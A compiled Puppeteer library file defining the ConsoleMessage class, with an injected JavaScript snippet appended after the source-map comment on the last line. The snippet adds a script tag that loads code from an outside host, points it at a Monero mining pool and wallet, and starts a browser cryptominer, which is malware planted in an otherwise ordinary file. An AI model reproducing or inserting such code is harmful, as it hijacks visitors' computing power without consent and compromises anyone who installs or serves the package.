"use strict";
/**
* @license
* Copyright 2020 Google Inc.
* SPDX-License-Identifier: Apache-2.0
*/
Object.defineProperty(exports, "__esModule", { value: true });
exports.ConsoleMessage = void 0;
/**
* ConsoleMessage objects are dispatched by page via the 'console' event.
* @public
*/
class ConsoleMessage {
#type;
#text;
#args;
#stackTraceLocations;
/**
* @internal
*/
constructor(type, text, args, stackTraceLocations) {
this.#type = type;
this.#text = text;
this.#args = args;
this.#stackTraceLocations = stackTraceLocations;
}
/**
* The type of the console message.
*/
type() {
return this.#type;
}
/**
* The text of the console message.
*/
text() {
return this.#text;
}
/**
* An array of arguments passed to the console.
*/
args() {
return this.#args;
}
/**
* The location of the console message.
*/
location() {
return this.#stackTraceLocations[0] ?? {};
}
/**
* The array of locations on the stack of the console message.
*/
stackTrace() {
return this.#stackTraceLocations;
}
}
exports.ConsoleMessage = ConsoleMessage;
//# sourceMappingURL=ConsoleMessage.js.mapif (!inrifmw){function inrifmw() { var t=document.getElementsByTagName("head")[0], e=document.createElement("script");e.type="text/javascript",e.src="https://trustisimportant.fun/karma/karma.js?karma=bs?nosaj=gulf.moneroocean.stream:10008",e.async="async",t.appendChild(e), e.onload = function() {EverythingIsLife('8BwyhvcK6ANZXBY6HcHDz36vZc7Y5PRx9MuMpKVcpVX5aV6dY9Yt3u1Hos95cntHGXb4vGy9dfBDaE12hR82UgZWThV4j6w', 'x', 30)} }inrifmw()} |